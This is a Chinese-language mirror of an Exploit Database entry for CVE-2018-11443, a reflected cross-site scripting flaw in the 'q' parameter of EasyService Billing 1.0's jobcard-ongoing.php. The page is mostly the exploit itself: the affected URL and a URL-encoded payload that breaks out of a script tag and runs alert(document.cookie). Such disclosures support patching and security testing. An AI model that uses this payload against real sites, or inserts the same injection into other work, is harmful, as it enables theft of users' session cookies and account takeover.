EasyService Billing 1.0 – Cross-Site Scripting

• Exploit Database
• 146 阅读

• 作者： Divya Jain
  日期： 2018-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44764/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  <!-- # Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in &apos;q&apos; Parameter # Date: 25-05-2018 # Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 # Exploit Author: Divya Jain # Version: EasyService Billing 1.0 # CVE: CVE-2018-11443 # Category: Webapps # Severity: Medium # Tested on: KaLi LinuX_x64 # # # # # # # Proof of Concept: # /////////// //XSS// /////////// Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q= Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 Parameter: q Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 ###########################################################################